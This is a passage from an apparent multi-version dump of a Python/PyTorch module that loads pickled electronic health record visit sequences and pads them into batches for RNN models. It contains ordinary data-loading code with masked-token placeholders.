tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n \"\"\" \n just the length of data\n 
\"\"\"\n if self.file != None:\n return len(self.data)\n else:\n print('No file specified')\n\n\nclass EHRdataFromLoadedPickles(Dataset):\n\n def __init__(self, loaded_list, transform=None, sort=True, model='RNN'):\n \"\"\"\n Args:\n 1) loaded_list from pickled file\n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes. \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.data = loaded_list\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.transform = transform\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n sample = self.data[idx]\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 
'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n return len(self.data)\n\n\ndef preprocess(batch, pack_pad, surv):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n if surv:\n lbt.append(Variable(flt_typ([label])))\n else:\n lbt.append(Variable(flt_typ([[float(label)]])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef preprocess_multilabel(batch, pack_pad):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n 
if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n lbt.append(Variable(flt_typ([label])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef my_collate(batch):\n if multilabel_m:\n mb_t, lbt_t, seq_l, mtd = preprocess_multilabel(batch, pack_pad)\n else:\n mb_t, lbt_t, seq_l, mtd = preprocess(batch, pack_pad, surv_m)\n return [mb_t, lbt_t, seq_l, mtd]\n\n\ndef iter_batch2(iterable, samplesize):\n results = []\n iterator = iter(iterable)\n for _ in range(samplesize):\n results.append(iterator.__next__())\n random.shuffle(results)\n return results\n\n\nclass EHRdataloader(DataLoader):\n\n def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None,\n batch_sampler=None, num_workers=0, collate_fn=my_collate,\n pin_memory=False, drop_last=False, timeout=0, worker_init_fn=None,\n packPadMode=False, surv=False, multilbl=False):\n DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=\n False, sampler=None, batch_sampler=None, num_workers=0,\n collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None)\n self.collate_fn = collate_fn\n global pack_pad\n global surv_m\n global multilabel_m\n pack_pad = 
packPadMode\n surv_m = surv\n multilabel_m = multilbl\n if multilabel_m:\n print('multilabel data processing')\n",
"step-3": "<mask token>\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n<mask token>\nwarnings.filterwarnings('ignore')\nplt.ion()\n<mask token>\nuse_cuda = torch.cuda.is_available()\n\n\nclass EHRdataFromPickles(Dataset):\n\n def __init__(self, root_dir, file=None, transform=None, sort=True,\n model='RNN', test_ratio=0, valid_ratio=0):\n \"\"\"\n Args:\n 1) root_dir (string): Path to pickled file(s).\n The directory contains the directory to file(s): specify 'file' \n please create separate instances from this object if your data is split into train, validation and test files. \n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.\n \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. 
\n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.file = None\n if file != None:\n self.file = file\n self.data = pickle.load(open(root_dir + file, 'rb'), encoding=\n 'bytes')\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.test_ratio = test_ratio\n self.valid_ratio = valid_ratio\n else:\n print('No file specified')\n self.root_dir = root_dir\n self.transform = transform\n\n def __splitdata__(self, sort=True):\n random.seed(3)\n random.shuffle(self.data)\n dataSize = len(self.data)\n nTest = int(self.test_ratio * dataSize)\n nValid = int(self.valid_ratio * dataSize)\n test = self.data[:nTest]\n valid = self.data[nTest:nTest + nValid]\n train = self.data[nTest + nValid:]\n if sort:\n test.sort(key=lambda pt: len(pt[2]), reverse=True)\n valid.sort(key=lambda pt: len(pt[2]), reverse=True)\n train.sort(key=lambda pt: len(pt[2]), reverse=True)\n return train, test, valid\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n if self.file != None:\n sample = self.data[idx]\n else:\n print('No file specified')\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n \"\"\" \n just the length of data\n 
\"\"\"\n if self.file != None:\n return len(self.data)\n else:\n print('No file specified')\n\n\nclass EHRdataFromLoadedPickles(Dataset):\n\n def __init__(self, loaded_list, transform=None, sort=True, model='RNN'):\n \"\"\"\n Args:\n 1) loaded_list from pickled file\n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes. \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.data = loaded_list\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.transform = transform\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n sample = self.data[idx]\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 
'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n return len(self.data)\n\n\ndef preprocess(batch, pack_pad, surv):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n if surv:\n lbt.append(Variable(flt_typ([label])))\n else:\n lbt.append(Variable(flt_typ([[float(label)]])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef preprocess_multilabel(batch, pack_pad):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n 
if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n lbt.append(Variable(flt_typ([label])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef my_collate(batch):\n if multilabel_m:\n mb_t, lbt_t, seq_l, mtd = preprocess_multilabel(batch, pack_pad)\n else:\n mb_t, lbt_t, seq_l, mtd = preprocess(batch, pack_pad, surv_m)\n return [mb_t, lbt_t, seq_l, mtd]\n\n\ndef iter_batch2(iterable, samplesize):\n results = []\n iterator = iter(iterable)\n for _ in range(samplesize):\n results.append(iterator.__next__())\n random.shuffle(results)\n return results\n\n\nclass EHRdataloader(DataLoader):\n\n def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None,\n batch_sampler=None, num_workers=0, collate_fn=my_collate,\n pin_memory=False, drop_last=False, timeout=0, worker_init_fn=None,\n packPadMode=False, surv=False, multilbl=False):\n DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=\n False, sampler=None, batch_sampler=None, num_workers=0,\n collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None)\n self.collate_fn = collate_fn\n global pack_pad\n global surv_m\n global multilabel_m\n pack_pad = 
packPadMode\n surv_m = surv\n multilabel_m = multilbl\n if multilabel_m:\n print('multilabel data processing')\n",
"step-4": "<mask token>\nfrom __future__ import print_function, division\nfrom tabulate import tabulate\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nimport warnings\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torch.nn as nn\nwarnings.filterwarnings('ignore')\nplt.ion()\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nuse_cuda = torch.cuda.is_available()\n\n\nclass EHRdataFromPickles(Dataset):\n\n def __init__(self, root_dir, file=None, transform=None, sort=True,\n model='RNN', test_ratio=0, valid_ratio=0):\n \"\"\"\n Args:\n 1) root_dir (string): Path to pickled file(s).\n The directory contains the directory to file(s): specify 'file' \n please create separate instances from this object if your data is split into train, validation and test files. \n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.\n \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. 
\n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.file = None\n if file != None:\n self.file = file\n self.data = pickle.load(open(root_dir + file, 'rb'), encoding=\n 'bytes')\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.test_ratio = test_ratio\n self.valid_ratio = valid_ratio\n else:\n print('No file specified')\n self.root_dir = root_dir\n self.transform = transform\n\n def __splitdata__(self, sort=True):\n random.seed(3)\n random.shuffle(self.data)\n dataSize = len(self.data)\n nTest = int(self.test_ratio * dataSize)\n nValid = int(self.valid_ratio * dataSize)\n test = self.data[:nTest]\n valid = self.data[nTest:nTest + nValid]\n train = self.data[nTest + nValid:]\n if sort:\n test.sort(key=lambda pt: len(pt[2]), reverse=True)\n valid.sort(key=lambda pt: len(pt[2]), reverse=True)\n train.sort(key=lambda pt: len(pt[2]), reverse=True)\n return train, test, valid\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n if self.file != None:\n sample = self.data[idx]\n else:\n print('No file specified')\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n \"\"\" \n just the length of data\n 
\"\"\"\n if self.file != None:\n return len(self.data)\n else:\n print('No file specified')\n\n\nclass EHRdataFromLoadedPickles(Dataset):\n\n def __init__(self, loaded_list, transform=None, sort=True, model='RNN'):\n \"\"\"\n Args:\n 1) loaded_list from pickled file\n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes. \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. \n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.data = loaded_list\n if sort:\n self.data.sort(key=lambda pt: len(pt[2]), reverse=True)\n self.transform = transform\n\n def __getitem__(self, idx, seeDescription=False):\n \"\"\"\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n \"\"\"\n sample = self.data[idx]\n if self.transform:\n sample = self.transform(sample)\n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time':\n vistc[:, 0], 'visit_codes': vistc[:, 1]}\n if seeDescription:\n \"\"\"\n if this is True:\n You will get a descriptipn of what each part of data stands for\n \"\"\"\n print(tabulate([['patient_id', desc['patient_id']], ['label',\n desc['label']], ['visit_time', desc['visit_time']], [\n 
'visit_codes', desc['visit_codes']]], headers=[\n 'data_description', 'data'], tablefmt='orgtbl'))\n return sample\n\n def __len__(self):\n return len(self.data)\n\n\ndef preprocess(batch, pack_pad, surv):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n if surv:\n lbt.append(Variable(flt_typ([label])))\n else:\n lbt.append(Variable(flt_typ([[float(label)]])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef preprocess_multilabel(batch, pack_pad):\n if use_cuda:\n flt_typ = torch.cuda.FloatTensor\n lnt_typ = torch.cuda.LongTensor\n else:\n lnt_typ = torch.LongTensor\n flt_typ = torch.FloatTensor\n mb = []\n mtd = []\n lbt = []\n seq_l = []\n bsize = len(batch)\n lp = len(max(batch, key=lambda xmb: len(xmb[-1]))[-1])\n llv = 0\n for x in batch:\n lv = len(max(x[-1], key=lambda xmb: len(xmb[1]))[1])\n 
if llv < lv:\n llv = lv\n for pt in batch:\n sk, label, ehr_seq_l = pt\n lpx = len(ehr_seq_l)\n seq_l.append(lpx)\n lbt.append(Variable(flt_typ([label])))\n ehr_seq_tl = []\n time_dim = []\n for ehr_seq in ehr_seq_l:\n pd = 0, llv - len(ehr_seq[1])\n result = F.pad(torch.from_numpy(np.asarray(ehr_seq[1], dtype=\n int)).type(lnt_typ), pd, 'constant', 0)\n ehr_seq_tl.append(result)\n time_dim.append(Variable(torch.from_numpy(np.asarray(ehr_seq[0],\n dtype=int)).type(flt_typ)))\n ehr_seq_t = Variable(torch.stack(ehr_seq_tl, 0))\n lpp = lp - lpx\n if pack_pad:\n zp = nn.ZeroPad2d((0, 0, 0, lpp))\n else:\n zp = nn.ZeroPad2d((0, 0, lpp, 0))\n ehr_seq_t = zp(ehr_seq_t)\n mb.append(ehr_seq_t)\n time_dim_v = Variable(torch.stack(time_dim, 0))\n time_dim_pv = zp(time_dim_v)\n mtd.append(time_dim_pv)\n lbt_t = Variable(torch.stack(lbt, 0))\n mb_t = Variable(torch.stack(mb, 0))\n if use_cuda:\n mb_t.cuda()\n lbt_t.cuda()\n return mb_t, lbt_t, seq_l, mtd\n\n\ndef my_collate(batch):\n if multilabel_m:\n mb_t, lbt_t, seq_l, mtd = preprocess_multilabel(batch, pack_pad)\n else:\n mb_t, lbt_t, seq_l, mtd = preprocess(batch, pack_pad, surv_m)\n return [mb_t, lbt_t, seq_l, mtd]\n\n\ndef iter_batch2(iterable, samplesize):\n results = []\n iterator = iter(iterable)\n for _ in range(samplesize):\n results.append(iterator.__next__())\n random.shuffle(results)\n return results\n\n\nclass EHRdataloader(DataLoader):\n\n def __init__(self, dataset, batch_size=128, shuffle=False, sampler=None,\n batch_sampler=None, num_workers=0, collate_fn=my_collate,\n pin_memory=False, drop_last=False, timeout=0, worker_init_fn=None,\n packPadMode=False, surv=False, multilbl=False):\n DataLoader.__init__(self, dataset, batch_size=batch_size, shuffle=\n False, sampler=None, batch_sampler=None, num_workers=0,\n collate_fn=my_collate, pin_memory=False, drop_last=False,\n timeout=0, worker_init_fn=None)\n self.collate_fn = collate_fn\n global pack_pad\n global surv_m\n global multilabel_m\n pack_pad = 
packPadMode\n surv_m = surv\n multilabel_m = multilbl\n if multilabel_m:\n print('multilabel data processing')\n",
"step-5": "# coding: utf-8\n\"\"\"\nCreated on Mon Oct 29 12:57:40 2018\n\n@authors Jzhu, Lrasmy , Xin128 @ DeguiZhi Lab - UTHealth SBMI\n\nLast updated Feb 20 2020\n\"\"\"\n\n#general utilities\nfrom __future__ import print_function, division\nfrom tabulate import tabulate\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nimport warnings\nfrom torch.autograd import Variable\nimport torch.nn.functional as F \nimport torch.nn as nn\nwarnings.filterwarnings(\"ignore\")\nplt.ion()\n\n#torch libraries \nimport torch\nfrom torch.utils.data import Dataset, DataLoader\n\nuse_cuda = torch.cuda.is_available()\n#use_cuda=False\n\n# Dataset class loaded from pickles\nclass EHRdataFromPickles(Dataset):\n def __init__(self, root_dir, file = None, transform=None, sort = True, model='RNN', test_ratio = 0, valid_ratio = 0):\n \"\"\"\n Args:\n 1) root_dir (string): Path to pickled file(s).\n The directory contains the directory to file(s): specify 'file' \n please create separate instances from this object if your data is split into train, validation and test files. \n 2) data should have the format: pickled, 4 layer of lists, a single patient's history should look at this (use .__getitem__(someindex, seeDescription = True))\n [310062,\n 0,\n [[[0],[7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]],\n [[66], [590, 596, 153, 8, 30, 11, 10, 240, 20, 175, 190, 15, 7, 5, 183, 62]],\n [[455],[120, 30, 364, 153, 370, 797, 8, 11, 5, 169, 167, 7, 240, 190, 172, 205, 124, 15]]]]\n where 310062: patient id, \n 0: no heart failure\n [0]: visit time indicator (first one), [7, 364, 8, 30, 10, 240, 20, 212, 209, 5, 167, 153, 15, 3027, 11, 596]: visit codes.\n \n 3)transform (optional): Optional transform to be applied on a sample. Data augmentation related. 
\n 4)test_ratio, valid_ratio: ratios for splitting the data if needed.\n \"\"\"\n self.file = None\n if file != None:\n self.file = file\n self.data = pickle.load(open(root_dir + file, 'rb'), encoding='bytes') \n if sort: \n self.data.sort(key=lambda pt:len(pt[2]),reverse=True) \n self.test_ratio = test_ratio \n self.valid_ratio = valid_ratio \n else:\n print('No file specified')\n self.root_dir = root_dir \n self.transform = transform \n \n def __splitdata__(self, sort = True):\n \n random.seed(3)\n random.shuffle(self.data)\n dataSize = len(self.data)\n nTest = int(self.test_ratio * dataSize)\n nValid = int(self.valid_ratio * dataSize) \n test= self.data[:nTest]\n valid = self.data[nTest:nTest+nValid]\n train = self.data[nTest+nValid:]\n if sort: \n #sort train, validation and test again\n test.sort(key=lambda pt:len(pt[2]),reverse=True) \n valid.sort(key=lambda pt:len(pt[2]),reverse=True) \n train.sort(key=lambda pt:len(pt[2]),reverse=True) \n return train, test, valid\n \n \n def __getitem__(self, idx, seeDescription = False):\n '''\n Return the patient data of index: idx of a 4-layer list \n patient_id (pt_sk); \n label: 0 for no, 1 for yes; \n visit_time: int indicator of the time elapsed from the previous visit, so first visit_time for each patient is always [0];\n visit_codes: codes for each visit.\n '''\n if self.file != None: \n sample = self.data[idx]\n else:\n print('No file specified')\n if self.transform:\n sample = self.transform(sample)\n \n vistc = np.asarray(sample[2])\n desc = {'patient_id': sample[0], 'label': sample[1], 'visit_time': vistc[:,0],'visit_codes':vistc[:,1]} \n if seeDescription: \n '''\n if this is True:\n You will get a descriptipn of what each part of data stands for\n '''\n print(tabulate([['patient_id', desc['patient_id']], ['label', desc['label']], \n 